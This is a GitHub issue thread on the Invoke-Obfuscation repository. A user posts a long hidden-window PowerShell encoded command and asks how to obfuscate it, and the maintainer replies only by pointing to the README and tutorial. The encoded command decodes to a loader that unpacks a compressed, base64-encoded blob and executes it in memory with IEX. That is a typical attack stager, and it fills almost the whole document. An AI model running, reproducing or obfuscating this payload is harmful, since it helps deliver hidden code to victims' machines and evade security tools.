### ISSUE TITLE
is posible obfuscate this?

### ISSUE THREAD

**Issue by gearcapitan** [danielbohannon/Invoke-Obfuscation#14]
how to obfuscate?

powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMADEAWABlADIALwBhAHkAaABMAC8ATwAzAHcASwA2AHkAaQBTAGIAWgBYAHcAVABrADUAYQBLAFYATABYAGcASABtAFUAVgB6AEEAWQBFAGcANQBDAGkAMwBjAHgARwA5AFoAZQBhAHEAOABEADkATABUAGYALwBZADYATgBhAGUAbABOAGUAbQA2AE8ASwBsADEATABsAHQAYQA3AE0ANwBNAHoAdgAzAG4AYQBvAHYATABLAGsAZwBGAHoAWgBGAGMAUQBxAGwAegBaAE4AQQBpAFoAOABKAFYAUwBKAG4ATgBaAEUAeQAyAHAAMwBDAGsAZgAxAGMAdwBxADgAaAAwAFoAYgA4AGUATABoAFUAdgBsAFkAaABzAEkAWgA0AEUASgBDAFcAZwBZAEsAbgA5AG4ATABnAFkANAB3AEoANgBpAFgAVAA3AGoAWQBPAEUASgBFAG4ARwBhAFYAWgBLAFAAbQBKAEMAUwBLAEsARAA2AHgAVQBYAG0ASQB0AG0ASwAvAEIAQwB2ADYATQBMAEgAawBqADMAVABoAFUAZgBsAFcAcABBAFEATAB0AEoAbQBhAEwAdQB0AEMAUQA4AHoAZgAvADcAaABRAHoAVQBLAEEAdQByAEwANAAzAGUAdQBRAFMAVQBLAFEAKwBvAHQATwBhAE8AaABwAGkAdABmAGwAYwBtAGEAQgB2AFMAcQB2ADMAeQBpAGoAbABUACsAVgBpADQAWAB1AFEAWQBYAFMAOAB4AFQAcwBrAE0AVgBPADIAcwB3AEMAUABrAGsAUAB1AHMASQBCADgAYwBXADUASwB3AHQAWgAxAEoAVAAvAC8AcABMADEAVwBkAFgAeABYAG0AdQAvAGoAbgBDAFAATgBSAFUANgB4AEIASwA2AHUAVQBJADUANgBxAHUAZgBOAFAAagBDADAAZQBIAEwAZABYAFUATABuAE0AQwBFAFkAcQBWAHoARQAyAFkAWAB5ADcAbAB4AG8AbgAyAHYAVQBUADUANwBsAEYAMwBWAGMAKwBBAGIAUQBHAFYAVQBlAEEAcgB2AHoAWQB4AGwAbgBuAGsAMABGAFIAWQBEAGcAQQBaAGQARQBSAFEAMQBYAE0AdAAvADEAbABzAHEASABiAHAAUgA1AHgAbgBsAFkALwBhAEwARgBWAG8ARwBQAG0AUwBlAFIAVABPAEoAUQAzAEUAMQBxAEwAQgBNADMATgBvAG0ARwB0AGkAbgAzAEEANgBwAEsAdQA1ADEAcQBPADcARQB3ADUAdgBaAGQATABPAG0AWQBCAHEASQBBAE0AOQBtADcAcgB2AEwAYgBwADMARQB4AGMAZgB4AGEAbgA2AFMAKwAzAFAANABrAEMASAA1ADAAVQBzADYASgBsAHYAbQBWAGUAaQBpAGwAQgBPAFgAUwB6AHAAUQBnAEwAMABaADIARwBWAHUAYgBpAFkASgBVAHMASwA5AG0AZwBEAEUAYgBLAEUANwAwADQAcABaAEoAVQB1AEsASQBHAGwAQwBBADcAdwBlAFQAawBLAEkAcQByAFAAbABWAG4AcwB1AHQAbAA4AG4AbAA1ADcANABnAHkAegB2AHgAUgBVAFAASABHAGwAUABFAGQAbgBIAHYAVwA0AFUAMgBhADIAWQBHAFMAZQB1AFUAagA4AG4ASgB6AEgAQgA0AHQAbAB4AEQAaQBoAFEAVQB6AHcANgA4AGkAdAAwAFIAWAB6AGEAZQAzAGcAWQA0ADgANQBwACsARABVAFgAbgBNAGEAWABYAEcAYQBBAEoASQA3AGsAZgBWAEEAVQBVADEATgBEAHkAaQBwAHAAZgBDAG8ATQBhAEsAegBsADIAeAAxAGoAOABuAHYAdgBNAFoAUgBPAGUAUwBBADQAMABQAFEAQwBtAEoAQwAvADEAbQBaAG8AeABNADEAdABlAFYAMwBxAFEAYwBBAEgAcgA5AFYAYwBOAFkASwBVAG8ASwBlAHEATgBNADAATwBKAHgAdQBqADcAKwBCAFMASwAxAHkASABJAFoAWgBaAFIAQgBCAFQAagBwAFoAeABhAEsAWQBVADUASgBWAGsAQgArAHkAOQBBAGgARgBVAGkAUgBMADkAWQBlADYAMwBZAGgATAA1AHUAQgBRAG4AcwBUAE4AOQBWAGMAZwBUAGEAKwB1AEMAagArAFUAUQBlAFMAQQBlAHcARwBHAGsAYgBXAGwARABzAE0AOABSAGkAVwByAE4AQgBtAGgAeABzAEYAaQA3AGsAawBGADkAVgBWAE0AcQBwAGgAegA1AHIAcwBnADYAUgBsADgAQQBqAHMAeABGAHAAYQBNAGcAeQBZAGcAMgBmADgATwBFAEQAMQBuAFUAZABuAHkAdABwAHgANgBRAEoAMQBVAEQASgBOAGoARgArAHAARABtAGwASgBKAHYARwBHAFgARQB2AFUAZgAxAEQANABsAHkAagBFAHIAWQBxAHgATwBJAEoAMABwAEQAUQBGAGcAYwBTAEcAegBpAHMAMABDAEMAVABWAEkAegBiADYASQB2AE4AOQBVADcAKwBlAFMAOQBKAE8AZQAxAFkAQwBtAG4AdABTAFMAVgBKAHcAWgBCAHgAawBuAFQARQBMAHAAeABKADMAZwA3AGoAdQBZAEMAWABTAEIAQgBOAGoATQBRAEgAZwBHAEQAdQBsAE4ASgBXADQAWgB2AHEAdgA5AGsAZQArAHoATgBvAEwAbgBvAGUAWAB6AEwAbQBsAHYAVwBMAEcAMQBnADcAYwBMADcANQBpAFYAVwA2AEwAMgBKAC8AbgBVAGYAbQByAG0AdQAwADQAMQBIAEQAVABNAFcAOABSADIANwBzADYANQA3AFMARgBuAHgAVwA3AE4AOQBoAFQAbwA3AGwAbQBoAGQAWQB0AEkAdABYAFAAZgBaAE8AYQB1AE8AZgB5AEUAaQBBAEYANwA3AGcATQByAHUAaQA0AGkAZwA2AGQAQgAzAGUAdgAwAFcAcQBGAFIAVABPAFUAYwArAFoAMQBLAHAAVABrAHQAbwBIAEsANQAwAGkAOABYAE4AbwBTADIAWQAvAG8ATgBJAGoAMgBQADcAZgBZAGQAVwBFAE4AdAA3AFgAYwBNADQAQwB1ADAAZQBMADEAZABIAFMANABuAEoAZgBOAHgAdwBwAHYANQBpAHIAbABlAFQAVQBSAG8AMwBWAFEAZQBDAFcANQBjAGMANABJAE0AUQBVAG8AOAB3AHYAWgBRAGoASgBxAE8AWgArAFQAegA5AGsAMAByAHQAcwByAG8ATABjAHYAYgA3AGIASwB4AFgAMwBlACsAMwBFAGYAZABLAGgASQBQAHAAZgBmAFMAYQBaAGcARgBQAEcAbQBIAGoANgBQAFEASABkAG0AOQA5AHQAQgBDAGwAYwA0AFQAKwByAE4AbABrAHUAMwBTAEcAegA2AFQAYwB0AGMAZAA4AFgAdQAzAFoAMQBYADIALwBZAE0AeABkAGoAeQArAGUAWgB4AGMARgB4AEkAWgB0AGQAQwAxAEoAdABmAGUAcwBtAGkAcwBTAGMATwBOAHUAdABZAEcAVABjAHoAMQB3ACsAKwArAHkATgB6AHMAOAAwAFUAeQB0AFkAdABrAGkARwB2AGIAQwBjAFcAcgBmAEoARgA2AG8AOQBpAEsAeQBaAGQAbQBlADIAeQBiAG4AMQBIAFIASABPAEoATwBhAEkAQgBkAG8AMwBGAGoAUABXAFcAUAArAFUAYgArAC8AYQBTADkAZQB5AGQAdgBKAHEATwBtAE4AZgBaAGMAMQBQADEAYwByAFkAOQA1ADIAeAByAGIANwBYAHYAYwBsADMAYgBuADYAVABsAGYAZgBQAEEAYgB1AEkAVwArAEkARgBSAHQAVgB4AHEAaQBQAG0ANgBJAGwAZQAyAHQAaQA4AFAAdABEAGYAQwBQAFQALwBkAE8AYwBMAFgAUQBhAEQAUgBqACsAaQBrAGkAZABYAGUAZgByADAAeABMAEIARgBuAHQAZAB6AFIAcwA0ADAAKwBCAFcAZQBIAGwAVwBKAGEAQgA2ACsAUAAxAEYASAB4AFoASABEAFgAegBkAGsAawAwAHgALwBiAGoAUABlADYAUQBhAFEAVQBCADcALwBJAFcAZABYAFkASQA5AFIAMQBTAE4ARgByACsAdwAwADEARgA3AFAAUAB2AFEAdgB1AG0ANABBAHQAMwBsAGMALwBuAEQAKwArAEwAZQBMAHcANwBnAEEAMwBpAHQAagBOAGgAOQBuAFAAZQB4AGgAdABEAEkATABBAEsATgBWAHkARQA2AGcAagBaAHAAZgBYAEQAMQBoAHgAdwBzAEcAMAAwAEwAdgBiAGIAMQAwAFUAaQBVAEIAWABPAHoAZAA0AEUARwA1ADgAbQBqAEgAYQBPAE8AbgBaAEwASABXAFAAWAByAEsAMABkAG8AMwBoAHQAUAA5AFYAdQBqAEQASgBjAGMATAB2AHYAagAxAHAAUgBkAC8AUQBBAFAAcQAxAEgAUABZAFQAdQAvAG8AQgBVAHUAcwBnAGsAbQBiAEcATQBWAHEAdABqAHYAZgA4AGYAagBiAGEATABnADMAQwBOAE8AZQBRAE0ATgBNAHQAVABwAFQATgBGAFkASwBZAHQAYgB5AEIAWQB6AEsARgBwAHIAdwA5AFUARwB4AHIANABsAE0ATwB3AEEAZQBQAEkAcQBUADQAZwB6AG8AVQBUAE4AKwBsAGYAZABFAHMAWQBHAFkANgBOAGYAQQA1ADEAYwBBAHoATABjAHUAbgBWAGwAYQA1ADgASgA5AFIALwBkAE8ANwBUADEAbwBjAFAAagAyAEIASQBXAG4AagBpAFEAcABEAHIAVQBOACsAVgA2ADIAeABoAFgAeQA0AFUAbwBOADAAVwA5AHAAVwBDAG4AbgBtADcALwBWAFcAeABQAFcAagBmAHAAVwBYAGoAagBuADAARwA1AGYAbABGAFAATABsAEkAegB4AHkAaABYAHMAcwAxADEAQwBqAHkAZgA4AFkANgByAFkAdgBKADEAZgA4AGUANgB4ADkANwAvADMARAA2AEoAdgB3AEwAMgBYAE8AUQBYAGgAegArAHYAUABGAHYAMwBQAEgANwBFAEUAMAB3AGsAOABCAHEAUQBmADMAbgA5AEQAagBCAHYAQgBXAHAATgBBAEQAUAA1AHMAVQB6AFQAMABPAEUAcgBkAEkAbgBIAHUALwA3AGsAYgB6AHEAdwBUAFMAWgBVAFQAOQBtAE0AcQAyAFYAYwBvAFoAUQB5AEwANwBBAFkARQA4AC8ASwA3AGQANgBQAEMATwBHAEUAZwBmAHkANgBrAGsAcwA0AFMAOABnAGEAWgBYAGEASgBkAGEAVgBWAG4AMgBxAFgARwBMAGwAbQAzAEkARgBvAEsAQwB3AFgASQBKAGYAZwBjAEMATgA0AHIANgBwAEgAUAA5AHMAdgBpAG8ANwBNAEMAVgBoAC8ASwBvAE0AcQBVAE4AaAAzAEwAMQBxAGkAeQBYADAAUQB3AHIAagBUAHkAdwA2AEUAUgBJAFQAdwA5ADUALwBBAEEATQBIAHAAcQBFAHEARABRAEEAQQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==

**Comment by danielbohannon** [comment]
See README documentation and TUTORIAL option once you're running Invoke-Obfuscation.
